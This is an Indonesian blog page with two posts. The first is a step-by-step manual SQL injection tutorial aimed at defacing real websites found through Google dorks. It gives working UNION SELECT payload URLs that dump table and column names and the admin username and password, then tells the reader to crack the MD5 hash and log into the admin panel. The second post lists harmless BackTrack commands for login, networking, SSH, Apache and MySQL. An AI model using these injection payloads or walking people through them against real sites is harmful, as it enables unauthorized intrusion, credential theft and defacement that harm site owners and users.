Tampilkan postingan dengan label Linux. Tampilkan semua postingan
Tampilkan postingan dengan label Linux. Tampilkan semua postingan

Sabtu, Agustus 17, 2013

Tutorial SQL Manual Sederhana

0 Coments

Selamat Malam Pemirsa xD
Berjumpa Lagi Dengan Admin Ganteng Disini 8)
Admin Mau Bagi Tutor Nih *weseh
SQL Manual,Yap Cara Yang Sudah Sangat Tua Namun Masih Vuln :v
Daripada Kebanyakan Bacot Mending Langsung Ke Tutorial :v

1. Anda cari target web untuk di di deface menggunakan dork. Bisa anda cari disini

2. Ketikkan dork itu di kotak pencarian google, maka akan muncul banyak web di hasil pencarian. Silahkan anda buka salah satu

3. Tambahkan karakter ' pada akhir url'nya untuk mengetahui vulnerability'nya
Contoh : www.site.com/news.php?id=32'

4. Jika muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface
Contoh errornya : warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

5. Sekarang saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter +order+by+1-- di belakang url
Contoh : www.site.com/news.php?id=32+order+by+1--

Anda coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=32+order+by+2--
www.site.com/news.php?id=32+order+by+3--
www.site.com/news.php?id=32+order+by+4--
Saya memisalkan jumlah table web ada 4 (errornya di 4)

6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4--
Contoh : www.site.com/news.php?id=32+union+select+1,2,3,4--
Saya memisalkan angka 3 yang keluar

7. Sekarang masukkan version() pada angka 3 untuk memaparkan version
Contoh : www.site.com/news.php?id=32+union+select+1,2,version(),4--

8. Kita munculkan nama - nama table yang ada pada web tersebut dengan memasukkan perintah table_name pada angka 3 dan perintah +from+information_schema.tables-- dibelakang url
Contoh : www.site.com/news.php?id=32+union+select+1,2,table_name,4+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web

9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 3 dan perintah +where+table_schema=database()-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--

10. Selanjutnya kita keluarkan isi yang ada di table tersebut (column) dengan memasukkan perintah group_concat(column_name) pada angka 3 dan +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- di akhir url
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu text nama table'nya ke hexadecimal disini
Jadi misalkan nama table'nya tadi admin maka jika di convert akan menjadi 61646D696E
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--
Nanti akan muncul column yang berisikan username dan password

11. Lalu kita lihat isi dari column yang kita temukan. Saya misalkan nama tablenya adalah admin, dan isi dari table admin adalah column username & password. Maka masukkan perintah concat_ws(0x3a,"nama column yang ada di dalam table admin") pada angka 3 dan perintah +from+Admin-- di akhir url
Contoh :  www.site.com/news.php?id=32+union+select+1,2,concat_ws(0x3a,"username,password"),4+from+Admin--

12. Maka kita akan melihat username dan password admin dari web tersebut. Saatnya kita eksekusi.

13. Cari admin pagenya, biasanya dengan menambahkan tulisan berikut di akhir url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat. Jika password berbentuk MD5 seperti e10adc3949ba59abbe56e057f20f883e, anda crack dulu disini

keyword : sql manual,deface dengan sql manual,tutorial sql manual,hack sql manual,sql injection,tutorial sql injection

Selasa, Juni 11, 2013

Command Dasar Backtrack

0 Coments


Bagi para pengguna backtrack yg udh biasa, pasti sdh tidak asing dengan command ini.. Tapi buat yg baru dalam backtrack, pasti ini sangat merepotkan jika command ini tidak di ketahui.

[*] Login
Username root password toor > default user pada backtrack, saran ane setelah login langsung ganti password dengan command
root@bt:~# passwd
kemudian masukkan password baru

[*] Memperbaiki tampilan splash:
root@bt:~# fix-splash

[*] Memulai X-server (Desktop GUI)
root@bt:~# startx

[*] networking
untuk memulai networking biasanya menggunakan WICD tpi sebelumnya ketik dulu di console:
root@bt:~# /etc/init.d/wicd start
lalu klik :
menu > internet > wicd netwok manager

setting ip dynamic,
root@bt:~# dhclient <interface network ente>
-- interface disini bisa saja eth0 atau eth1

Setting IP static
misalnya :
interface - eth0
IP Address - 192.168.1.9/24
Default Gateway - 192.168.1.1
DNS server - 192.168.1.1
maka perintah yang digunakan adalah :

root@bt:~# ifconfig eth0 192.168.1.9/24
root@bt:~# route add default gw 192.168.1.1
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

settingan ini akan kembali default bila di reboot, untuk menjadikan permanen maka kita perlu meng-edit file /etc/network/interfaces,

root@bt:~# nano /etc/network/interfaces

auto eth0
iface eth0 inet static
address 192.168.1.9
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

kemudian save dengan menggunakan perintah CTRL+X kemudian jawab y kemudian enter

root@bt:~# update-rc.d networking defaults
root@bt:~# /etc/init.d/networking restart

[*] Memulai service di BT :

    SSH (Secure Shell)
    sebelum menjalankan service ssh unutk pertama kali, kita perlu meng-generate key nya jalankan perintah:
    root@bt:~# sshd-generate
    root@bt:~# /etc/init.d/ssh start
    Starting OpenBSD Secure Shell server: sshd.

    untuk menghentikan service :
    root@bt:~# /etc/init.d/ssh stop
    Stopping OpenBSD Secure Shell server: sshd.
    apache webserver
    root@bt:~# /etc/init.d/apache2 start
    atau bisa jg dengan perintah

    root@bt:~# service apache2 start
    * Starting web server apache2

    atau :
    root@bt:~# apache2ctl start

    untuk menghentikan service :

    root@bt:~# /etc/init.d/apache2 stop

    atau :
    root@bt:~# service apache2 stop

    atau :
    root@bt:~# apache2ctl stop
    MySQL
    untuk memulai bisa menggunakan perintah :
    root@bt:~# /etc/init.d/mysql start

    atau:
    root@bt:~# start mysql

    untuk menghentikan :
    root@bt:~# /etc/init.d/mysql stop

    atau :
    root@bt:~# stop mysql